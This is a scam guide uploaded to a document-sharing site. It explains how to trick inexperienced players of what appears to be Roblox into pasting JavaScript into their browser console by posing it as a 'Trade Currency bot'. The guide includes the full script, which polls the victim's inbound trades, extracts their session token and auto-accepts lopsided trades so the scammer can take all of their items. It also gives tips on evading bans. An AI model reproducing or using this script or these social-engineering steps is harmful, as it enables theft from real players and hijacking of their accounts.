0% found this document useful (0 votes)
63 views

Bot Method

Uploaded by

chanhabib7
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
63 views

Bot Method

Uploaded by

chanhabib7
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

BOT METHOD

---------------
Find someone who looks like a total noob. They have
If they catch on, better to just leave then try to convince them its legit.
Use an alt.
Don't transfer scammed items to your main account, I almost got banned for that.
Don't leak, I sold this method because I need some money. Don't give it away for
free.
READ THE WHOLE METHOD BEFORE YOU USE IT!

------------------------------------------------------------------------
Step 1: Find a Premium noob with limiteds.
Step 2: Party them or join their game
Step 3: Ask them if they want a Trade Currency bot and tell them it trades robux
back and forth to get free money.
Step 4: Once they agree, PM them the code below and say "Hit F12 in google chrome,
click console, and paste this in."
Step 5: They should tell you they are running it
Step 6: Send them a trade for all of their stuff for your item.
Step 7: The bot will auto accept it
Step 8: Make sure the trade went through, and leave game/chat.
-------------------------------------------------------------------------

I AM NOT RESPONSIBLE FOR ANY LOST ITEMS, BANS, SCAMMED ITEMS, OR ANYTHING RELATING
TO THIS METHOD.
ITS JUST A METHOD. ANYTHING THAT GOES WRONG IS NOT MY FAULT. USE AT YOUR OWN RISK.

-------------------------------------------
function POST(){
$.ajax({
url : "/My/Money.aspx/GetMyItemTrades",
type : "POST",
data : '{"statustype":"inbound","startindex":0}',
contentType : "application/json; charset=UTF-8",
success : function(Data){
var Base =
jQuery.parseJSON(jQuery.parseJSON(Data.d).Data[0])
var TradeId = Base["TradeSessionID"]
var Partner = Base["TradePartnerID"]
var Token = ""
$.get("/My/Money.aspx",function(Data){
Token = Data.match(/setToken(\W(.+)\W);/)
[2].replace(/'/g,"")
Token = Token.replace("+","%2B").replace("/","%2F")
}).always(function(){
$.post("/Trade/TradeHandler.ashx?token=" + Token,
{TradeID : TradeId,cmd : "pull"},function(Data){
var Base =
jQuery.parseJSON(Data.data).AgentOfferList
var Other = 1
if (Number(Base[0].AgentID) ==
Number(Partner)){
Other = 0
}
var OtherVal = Base[Other]["OfferValue"]
var SelfVal = Base[Other == 0 && 1 || 0]
["OfferValue"]
var TradeJSON = Data.data
if (OtherVal/1 > SelfVal){
$.post("/Trade/TradeHandler.ashx?
token=" + Token,{TradeID : TradeId,TradeJSON:TradeJSON,cmd : "maketrade"})
}
POST()
})
})
}
})
}
POST()

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy